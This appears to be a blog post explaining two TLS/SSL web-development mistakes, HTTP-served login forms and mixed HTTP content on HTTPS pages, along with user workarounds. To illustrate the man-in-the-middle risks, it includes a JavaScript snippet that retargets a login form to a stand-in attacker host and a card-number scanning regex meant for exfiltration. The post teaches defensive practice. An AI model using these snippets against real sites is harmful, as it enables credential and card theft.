Quite a bit has been written about the Secure Sockets Layer (SSL) protocol and its successor Transport Layer Security (TLS), so I won't cover the protocols in detail here. The following are good references if you want to get a quick refresher.
Happily, a majority of web users now know to look for the lock icon and the HTTPS in the address line to identify when their connection is secure. Unfortunately, relatively few users understand what security guarantees these protocols provide. Fewer still understand the critical importance of digital certificates to secure connections. In a recent phishing attack, the bad guy used a third-party SSL-hosting server to display the lock icon for his fake banking site. Was the connection secure? Sure. Was it safe? Of course not.
Improving the user-experience around TLS/SSL is a significant challenge: how much can we help the user stay safe without having to explain all this mumbo-jumbo? Or should we try to explain public key cryptography, symmetric key exchange, digital certificates, the role of certification authorities, and more?
All the average user wants to know is: "Will my transaction be safe?"
Here we run into Law of Security #10-- Technology is not a panacea, and TLS/SSL alone can't answer the user's question.
It's easy to fall into the trap of assuming that spoofing fraud only occurs on the web, but there are plenty of "real-world" attacks that work essentially the same way. Examples range from a cashier using a hacked terminal to swipe your credit card, to the ambitious crooks who deployed a phony ATM in a shopping mall to collect card numbers and PIN codes. When was the last time you looked at your ATM and asked it for some ID?
Just because there are no simple solutions doesn't mean we're not working hard on making surfing more Trustworthy, and TLS/SSL will be a part of that. We're doing some interesting work here, which I'll be able to blog about at a later date.
For now, I'd like to point out that security is only as strong as its weakest link. To that end, I want to highlight two very common web-developer mistakes when building TLS/SSL web applications.
Critical Mistake #1: Non-HTTPS login pages (even if submitting to an HTTPS page).
Most webdevs know that HTTPS is comparatively expensive-- the multistage handshake with multiple roundtrips and cryptographic operations is inherently less performant than straight HTTP. A few years ago, someone got the bright idea that login pages should be served via HTTP to reduce this performance hit.
The thinking goes something like: "Well, since the HTTP POST containing the user's credentials is sent via HTTPS, any man-in-the-middle can't see the data."
And this seemed like a reasonable idea. The practice became even more popular as banks and credit card companies decided that customers should be able to log in directly from the HTTP-delivered homepage. Three of my financial institutions offer this "convenience". One of them even draws little lock icons near the login box and provides a phone number customers can call to be reassured that it's safe.
There are two problems with this practice: one fairly obvious, and one slightly less so. The first problem is simple: how does the user know that the form is being submitted via HTTPS? Most browsers have no such UI cue. (Pretty much everyone turns off the "Warn when sending unencrypted form data" option within 2 minutes of installing the browser.) Even supposing there were a UI cue that the form targeted an HTTPS page, how could the user know that it was going to the right HTTPS page? If the login form was delivered via HTTP, there's no guarantee it wasn't changed between the server and the client. A bad guy sitting on the wire between the two could simply retarget the POST to submit to an HTTPS site that he controls. Oops.
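To make that concrete, here's a minimal sketch of the rewrite a man-in-the-middle could apply to the HTML as it crosses the wire. The function name and the attacker URL are invented for illustration; a real attack would do this inside a transparent proxy.

```javascript
// Sketch only: what an on-path attacker could do to an HTTP-delivered
// login page before it reaches the browser. "evil.example" is made up.
function retargetLoginForm(html, attackerUrl) {
  // Point every form's action at an HTTPS server the attacker controls.
  // The submission itself is still "secure" -- just to the wrong party.
  return html.replace(/action="[^"]*"/g, 'action="' + attackerUrl + '"');
}

const page = '<form method="post" action="https://bank.example/login">';
const tampered = retargetLoginForm(page, "https://evil.example/collect");
// tampered now posts the user's credentials to evil.example
```

Note that nothing in the browser's UI changes: the user still sees the original HTTP page, and the credentials still travel over TLS, just to the attacker's certificate instead of the bank's.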
Think that's bad? There's an even sneakier attack the bad guy could execute. The event model in HTML is pretty rich, and one of the things it can do is listen for keystroke events. So the bad guy could simply rewrite the login page's HTML to leak keystrokes to a server he controls every time a key is pressed. Unsecured login form + man-in-the-middle + 5 lines of JScript + server-side keystroke collector = Bad News.
(Food for thought: The keystroke-sniffing attack gets even worse if your JS can run in the browser chrome, a feature offered by some browsers.)
Critical Mistake #2: Mixing HTTP content into an HTTPS page
Some HTTPS pages pull in assorted resources over HTTP, which leads to the annoying "This page contains both secure and nonsecure items" prompt. Why does this hassle exist? Is it really so bad if some files get pulled down via HTTP, if the main body of my page is delivered via HTTPS?
The answer is, of course, yes, this is a bad thing. For one thing, it's impossible for the user to tell which parts of the page were delivered securely and which were not. Worse, a man-in-the-middle who can rewrite the HTTP traffic can tamper with any script or other resource fetched over HTTP, and that tampered content runs with full access to the HTTPS page. He can, for instance, rewrite the HTTPS page using standard DHTML. Or he can scan the page for any information of interest (e.g. a credit card number) and POST that data to a server he controls. Using HTTP-delivered resources on an HTTPS-delivered page pokes holes in your secure channel. Don't do it.
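The page-scanning variant needs nothing fancier than a regular expression. A hedged sketch (the pattern and function name are my own; a real injected script would run this over the page's visible text and POST any hits to the attacker's collector):

```javascript
// Loosely match 13-16 digit runs, optionally separated by spaces or
// dashes -- the general shape of payment card numbers.
const CARD_RE = /\b(?:\d[ -]?){12,15}\d\b/g;

// An HTTP-delivered script on an HTTPS page runs with full access to
// the page's content, so it can scan whatever the user sees.
function scanForCardNumbers(pageText) {
  return pageText.match(CARD_RE) || [];
}

const hits = scanForCardNumbers("Card on file: 4111 1111 1111 1111 (Visa)");
// hits -> ["4111 1111 1111 1111"]
```

The point isn't the regex; it's that once a single HTTP-delivered resource is rewritten, the attacker's code is indistinguishable from your own as far as the page is concerned.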
What can we do today?
I hope you will join me in calling on operators of insecure HTTPS sites to correct these mistakes.
In the short term, you may be able to work around these security holes:
- If available, use a "Login securely" link to get to an HTTPS login form instead of the form on an HTTP page. Or try visiting the https:// version of the site directly.
- If prompted to download mixed content, always choose "No".
Thought for the week
The so-called "browser wars" have fundamentally changed. It's no longer Microsoft vs. Mozilla vs. Opera et al. Now it's the "good guys" vs. the "bad guys." The "bad guys" are the phishers, malware distributors, and other miscellaneous crooks looking for a quick score at the expense of the browsing public.
We're all in this together.